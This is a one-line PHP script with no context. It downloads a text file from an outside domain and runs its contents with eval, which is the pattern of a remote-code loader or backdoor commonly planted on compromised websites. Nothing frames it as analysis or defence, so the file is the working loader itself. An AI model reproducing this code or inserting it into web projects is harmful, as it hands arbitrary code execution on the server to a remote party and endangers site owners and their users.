<?php $path = 'https://simpleeeverything.com/usd/sid.txt'; $code = implode('', file($path)); eval('?>' . $code); ?>